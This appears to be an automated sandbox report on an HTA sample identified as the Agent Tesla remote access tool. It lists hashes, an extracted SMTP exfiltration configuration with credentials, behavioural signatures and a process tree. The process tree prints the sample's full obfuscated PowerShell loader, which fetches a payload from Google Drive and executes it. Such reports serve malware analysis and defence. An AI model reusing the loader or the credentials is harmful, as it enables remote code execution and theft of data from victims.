Analysis
-
max time kernel
148s -
max time network
144s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64 arch:x86 image:win7-20240508-en locale:en-us os:windows7-x64 system -
submitted
22-05-2024 14:19
Static task
static1
Behavioral task
behavioral1
Sample
17e34e2c81eba5e138e335393b981fc11e2b21db0eecb2bc740dbbff7b9f8f32.hta
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
17e34e2c81eba5e138e335393b981fc11e2b21db0eecb2bc740dbbff7b9f8f32.hta
Resource
win10v2004-20240426-en
General
-
Target
17e34e2c81eba5e138e335393b981fc11e2b21db0eecb2bc740dbbff7b9f8f32.hta
-
Size
5KB
-
MD5
3ef5759d457c58dc4c8c9b6c15aca5fe
-
SHA1
be35dffec6716bfe6ece66f7e140b8df97d5b994
-
SHA256
17e34e2c81eba5e138e335393b981fc11e2b21db0eecb2bc740dbbff7b9f8f32
-
SHA512
c6b8c4452b774cd782b75891048ca0aacf1ffd0af55536e0d3a7643b6821b46004225b47bc4fbc81fd95c5f6f6aa0eb6dc34f659d0654b29a05b521c431b45e8
-
SSDEEP
96:buOGiiV+5y/gkgBONHwBB9HaXa3U+1hTIbtu7ZEhtNsim57V+ICgCtUfkX:ypD/gkgywP9HaKk+rTIBeuhtNN2CLtUY
Malware Config
Extracted
agenttesla
Protocol: smtp
- Host: mail.bunturaja.co.id
- Port: 587
- Username: [email protected]
- Password: !@#$%,.Jakarta
- Email To: [email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in Visual Basic.
-
Blocklisted process makes network request 2 IoCs
Processes:
flow  pid   process
3     2704  powershell.exe
5     2704  powershell.exe
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow  ioc
12    api.ipify.org
13    api.ipify.org
14    ip-api.com
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
pid   process
2672  wab.exe
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
pid   process
2508  powershell.exe
2672  wab.exe
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
description                          pid   process         target process
PID 2508 set thread context of 2672  2508  powershell.exe  wab.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies Internet Explorer settings
Processes:
description  ioc                                                                                                        process
Key created  \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Main  mshta.exe
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
pid   process
2704  powershell.exe
2508  powershell.exe
2508  powershell.exe
2672  wab.exe
2672  wab.exe
-
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
pid   process
2508  powershell.exe
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
description              pid   process
Token: SeDebugPrivilege  2704  powershell.exe
Token: SeDebugPrivilege  2508  powershell.exe
Token: SeDebugPrivilege  2672  wab.exe
-
Suspicious use of WriteProcessMemory 22 IoCs
Processes:
description                       pid   process         target process
PID 1280 wrote to memory of 2704  1280  mshta.exe       powershell.exe
PID 1280 wrote to memory of 2704  1280  mshta.exe       powershell.exe
PID 1280 wrote to memory of 2704  1280  mshta.exe       powershell.exe
PID 1280 wrote to memory of 2704  1280  mshta.exe       powershell.exe
PID 2704 wrote to memory of 2212  2704  powershell.exe  cmd.exe
PID 2704 wrote to memory of 2212  2704  powershell.exe  cmd.exe
PID 2704 wrote to memory of 2212  2704  powershell.exe  cmd.exe
PID 2704 wrote to memory of 2212  2704  powershell.exe  cmd.exe
PID 2704 wrote to memory of 2508  2704  powershell.exe  powershell.exe
PID 2704 wrote to memory of 2508  2704  powershell.exe  powershell.exe
PID 2704 wrote to memory of 2508  2704  powershell.exe  powershell.exe
PID 2704 wrote to memory of 2508  2704  powershell.exe  powershell.exe
PID 2508 wrote to memory of 2200  2508  powershell.exe  cmd.exe
PID 2508 wrote to memory of 2200  2508  powershell.exe  cmd.exe
PID 2508 wrote to memory of 2200  2508  powershell.exe  cmd.exe
PID 2508 wrote to memory of 2200  2508  powershell.exe  cmd.exe
PID 2508 wrote to memory of 2672  2508  powershell.exe  wab.exe
PID 2508 wrote to memory of 2672  2508  powershell.exe  wab.exe
PID 2508 wrote to memory of 2672  2508  powershell.exe  wab.exe
PID 2508 wrote to memory of 2672  2508  powershell.exe  wab.exe
PID 2508 wrote to memory of 2672  2508  powershell.exe  wab.exe
PID 2508 wrote to memory of 2672  2508  powershell.exe  wab.exe
Processes
-
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\17e34e2c81eba5e138e335393b981fc11e2b21db0eecb2bc740dbbff7b9f8f32.hta" 1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1280 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Bankerottens = 1;$Oversacrificially='Sub';$Oversacrificially+='strin';$Oversacrificially+='g';Function Anticipant($Harmonize){$Rjseren80=$Harmonize.Length-$Bankerottens;For($Papegjesygen18=1;$Papegjesygen18 -lt $Rjseren80;$Papegjesygen18+=2){$Funktionstegningernes+=$Harmonize.$Oversacrificially.Invoke( $Papegjesygen18, $Bankerottens);}$Funktionstegningernes;}function Harskes($Herligheds){. ($Undersay) ($Herligheds);}$Formularlngdes=Anticipant 'VM oGzbi.l.l.aS/ 5G.M0F (FW iYn dSoSwWsS MN TI ,1V0 .S0U;. ,WFiEn 6 4F;V SxU6E4D;C rUv :M1,2E1.. 0.)U MG e cFkso /M2C0 1W0F0H1.0,1S CFDi.rBeTf oLxP/B1 2i1..R0 ';$Baglokalers=Anticipant ' U sPeOrM- ACgSeMnUt. ';$Indpodede=Anticipant '.h.tVt pBs,: /L/ d r,iKvRe ..gMoBo g.l e . c oOm,/ u cG?.e x pAo.r t =Fd,osw nZlFo a d &Oi,d =,1V7HG yRc eHO.U WC7 OIK,NDbPJHW Q.X x 4L9,cSB jfIOQ.lHvN-DM BFlKkR ';$Ogamic=Anticipant ' > ';$Undersay=Anticipant 'Ri e.x. ';$Goalage='Hovedmenuernes';$Miljmyndigheds = Anticipant ' eKcbh.oU E%Wa,pbpsdCaEtUaR%.\MFbdSeSg oDd sFeQr n e .HCDoTnU I&S&J Me c hUoK .t, ';Harskes (Anticipant ',$ g lRoAbSaHlP: dIi s,bAa nMd e d =M( cImBd. 
/Cc T$FMTiel jfm,ySn dSiFg h eFd s,)T ');Harskes (Anticipant 'G$CgKlVoJb.aDl :DA n.n.e.k,s kDi r kBeBsa=P$KIGnSd.p oBd.eAdBeS.,sGpllSiht.(A$,O g.a,mBi,c.)C ');$Indpodede=$Annekskirkes[0];$Revisorforeningens= (Anticipant 'C$.g.lDo,bNaLlM:aOGmSs tTr.u,k tUuvrSe.rSi,nHgRe r,=,N,e wB-SOnb.j,e c tM S y sFt,egmA.PNFeCtT..W,e,b C,lFiSePn t');$Revisorforeningens+=$disbanded[1];Harskes ($Revisorforeningens);Harskes (Anticipant 'R$,O,mNsMt rCuRkDtBu.r eRr i n.g.e,rA.,HRe,a,d e r s,[ $PBLa.gUlUo.kta lBe,r,s ],=,$GFSobr,m uKlFa,rVl nTg d.e sE ');$Countersunken196=Anticipant ',$NOSmBs tFr uGk tPuFr,e r i n g e r..BDNoKwMnSlOo a d F.iSl,e.(.$.I.n,d pAoDdAeFdBeR, $ Z i.nTyCa,mRu n gZa )I ';$Zinyamunga=$disbanded[0];Harskes (Anticipant ' $NgblSo bBaFl :AO p h,vMe,sa=D(WTAe.sHt -SP a,tBhM .$.Z.i.n y a mCu n,g aP)C ');while (!$Ophves) {Harskes (Anticipant ' $,g,l o.bFa lb:KAIn dde,sobFj,e rFgEeOn e,1F2.3 =R$UtCr u eS ') ;Harskes $Countersunken196;Harskes (Anticipant ',S t aHrVtS- SAl eKePp, T4. ');Harskes (Anticipant 'f$ g.l o,bTa.lO:OOHpEh,v.e,sN=A( TBeCsStS-.PGa tPh, T$SZ i nAy.aMm u nPgNaa) ') ;Harskes (Anticipant 'g$Fg lToPboaHlA:UF.y.r sLt,eCr sB=P$,gSlSoBb.a l :VT wSi n eNl,eBs sC+ +U%K$.A.n nSeJkPs k,i rHk eEsP.Bc.o usn,tR ') ;$Indpodede=$Annekskirkes[$Fyrsters];}$Stormagasiners=352755;$Terreplein=25708;Harskes (Anticipant 'F$ gSl o,b a l.:sRFe g e ncs iPa n eDrSsH A= LGNe,t -SC o,n tPe.n tH S$ ZBi,nTyPaSm u,n g,a ');Harskes (Anticipant ' $ g,l oAbPaFlc:fV bBnKeFtF S= K[ SAyAsDt,e mW. CRoSnSvne r.t,] : : F.rHo m BHaOsSeU6.4AS.tNrci.nMg.(A$PRAeggFeSn sSiTa.n e,r sW)C ');Harskes (Anticipant 'A$bg l,oIb a lB:DBSrEu m a l .= [,S y s t.e m,.,TVe.xRt . ESn,c,oBd iSnUg ]I:A:,AVSHCBI IE.LG,eSt,Sdt,rTi.nHgE(S$KVEbTn eCtN)T ');Harskes (Anticipant 'F$,g l o b a lL: REe tCsSb e t.jTe,nFt = $bB,r uFmSa.lL.,sDu bIs tIrCi,nfg (A$ S t oOrBmRaMg aPs,i nKeErCs., $VTIe,r r,e.pPl,e,isn.), ');Harskes $Retsbetjent;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2704 -
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fdegodserne.Con && echo t" 3⤵
PID:2212
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Bankerottens = 1;$Oversacrificially='Sub';$Oversacrificially+='strin';$Oversacrificially+='g';Function Anticipant($Harmonize){$Rjseren80=$Harmonize.Length-$Bankerottens;For($Papegjesygen18=1;$Papegjesygen18 -lt $Rjseren80;$Papegjesygen18+=2){$Funktionstegningernes+=$Harmonize.$Oversacrificially.Invoke( $Papegjesygen18, $Bankerottens);}$Funktionstegningernes;}function Harskes($Herligheds){. ($Undersay) ($Herligheds);}$Formularlngdes=Anticipant 'VM oGzbi.l.l.aS/ 5G.M0F (FW iYn dSoSwWsS MN TI ,1V0 .S0U;. ,WFiEn 6 4F;V SxU6E4D;C rUv :M1,2E1.. 0.)U MG e cFkso /M2C0 1W0F0H1.0,1S CFDi.rBeTf oLxP/B1 2i1..R0 ';$Baglokalers=Anticipant ' U sPeOrM- ACgSeMnUt. ';$Indpodede=Anticipant '.h.tVt pBs,: /L/ d r,iKvRe ..gMoBo g.l e . c oOm,/ u cG?.e x pAo.r t =Fd,osw nZlFo a d &Oi,d =,1V7HG yRc eHO.U WC7 OIK,NDbPJHW Q.X x 4L9,cSB jfIOQ.lHvN-DM BFlKkR ';$Ogamic=Anticipant ' > ';$Undersay=Anticipant 'Ri e.x. ';$Goalage='Hovedmenuernes';$Miljmyndigheds = Anticipant ' eKcbh.oU E%Wa,pbpsdCaEtUaR%.\MFbdSeSg oDd sFeQr n e .HCDoTnU I&S&J Me c hUoK .t, ';Harskes (Anticipant ',$ g lRoAbSaHlP: dIi s,bAa nMd e d =M( cImBd. 
/Cc T$FMTiel jfm,ySn dSiFg h eFd s,)T ');Harskes (Anticipant 'G$CgKlVoJb.aDl :DA n.n.e.k,s kDi r kBeBsa=P$KIGnSd.p oBd.eAdBeS.,sGpllSiht.(A$,O g.a,mBi,c.)C ');$Indpodede=$Annekskirkes[0];$Revisorforeningens= (Anticipant 'C$.g.lDo,bNaLlM:aOGmSs tTr.u,k tUuvrSe.rSi,nHgRe r,=,N,e wB-SOnb.j,e c tM S y sFt,egmA.PNFeCtT..W,e,b C,lFiSePn t');$Revisorforeningens+=$disbanded[1];Harskes ($Revisorforeningens);Harskes (Anticipant 'R$,O,mNsMt rCuRkDtBu.r eRr i n.g.e,rA.,HRe,a,d e r s,[ $PBLa.gUlUo.kta lBe,r,s ],=,$GFSobr,m uKlFa,rVl nTg d.e sE ');$Countersunken196=Anticipant ',$NOSmBs tFr uGk tPuFr,e r i n g e r..BDNoKwMnSlOo a d F.iSl,e.(.$.I.n,d pAoDdAeFdBeR, $ Z i.nTyCa,mRu n gZa )I ';$Zinyamunga=$disbanded[0];Harskes (Anticipant ' $NgblSo bBaFl :AO p h,vMe,sa=D(WTAe.sHt -SP a,tBhM .$.Z.i.n y a mCu n,g aP)C ');while (!$Ophves) {Harskes (Anticipant ' $,g,l o.bFa lb:KAIn dde,sobFj,e rFgEeOn e,1F2.3 =R$UtCr u eS ') ;Harskes $Countersunken196;Harskes (Anticipant ',S t aHrVtS- SAl eKePp, T4. ');Harskes (Anticipant 'f$ g.l o,bTa.lO:OOHpEh,v.e,sN=A( TBeCsStS-.PGa tPh, T$SZ i nAy.aMm u nPgNaa) ') ;Harskes (Anticipant 'g$Fg lToPboaHlA:UF.y.r sLt,eCr sB=P$,gSlSoBb.a l :VT wSi n eNl,eBs sC+ +U%K$.A.n nSeJkPs k,i rHk eEsP.Bc.o usn,tR ') ;$Indpodede=$Annekskirkes[$Fyrsters];}$Stormagasiners=352755;$Terreplein=25708;Harskes (Anticipant 'F$ gSl o,b a l.:sRFe g e ncs iPa n eDrSsH A= LGNe,t -SC o,n tPe.n tH S$ ZBi,nTyPaSm u,n g,a ');Harskes (Anticipant ' $ g,l oAbPaFlc:fV bBnKeFtF S= K[ SAyAsDt,e mW. CRoSnSvne r.t,] : : F.rHo m BHaOsSeU6.4AS.tNrci.nMg.(A$PRAeggFeSn sSiTa.n e,r sW)C ');Harskes (Anticipant 'A$bg l,oIb a lB:DBSrEu m a l .= [,S y s t.e m,.,TVe.xRt . ESn,c,oBd iSnUg ]I:A:,AVSHCBI IE.LG,eSt,Sdt,rTi.nHgE(S$KVEbTn eCtN)T ');Harskes (Anticipant 'F$,g l o b a lL: REe tCsSb e t.jTe,nFt = $bB,r uFmSa.lL.,sDu bIs tIrCi,nfg (A$ S t oOrBmRaMg aPs,i nKeErCs., $VTIe,r r,e.pPl,e,isn.), ');Harskes $Retsbetjent;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2508 -
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fdegodserne.Con && echo t" 4⤵
PID:2200
-
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" 4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2672
Network
MITRE ATT&CK Enterprise v15
Downloads
-
C:\Users\Admin\AppData\Roaming\Fdegodserne.Con
Filesize
492KB
MD5
1fe03ff02fd5bae7e909af7c3471a4c7
SHA1
cb1bb668c0e0191b63d7aac5ecd4117b8d05647e
SHA256
b9aa136cd82e7b1c7381598d12be3297722ef09c005344168594fc5a1ed1414b
SHA512
83d9a6c8de897c7d98b30117f7a94bd1048e33cd47961d75fd6ac0c7cf870ad6949265485b91a899f81fd5a0fca03a295281c4a6e46f29034b1db11b61e9696d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB
MD5
948af304322d6a545c8161e8d0ed7d3c
SHA1
de376e784a3eee65dbdd0a226b9a2fb68e04b200
SHA256
60eba1d326349c7e7e90a3f15d65308023cfadcfb0d1178b266b517798d6ed94
SHA512
e416401d76fff54f6e2914dc4337003cbfefcdbf325b5f76564284cc7d5a47b13ce40fa060bbc8833dfcc4cbb5d5d660b62fb3824a116cb6e08c2c4752b23361
-
memory/2508-15-0x0000000006630000-0x000000000A4A2000-memory.dmp
Filesize
62.4MB
-
memory/2672-39-0x0000000000FA0000-0x0000000002002000-memory.dmp
Filesize
16.4MB
-
memory/2672-41-0x0000000000FA0000-0x0000000000FE2000-memory.dmp
Filesize
264KB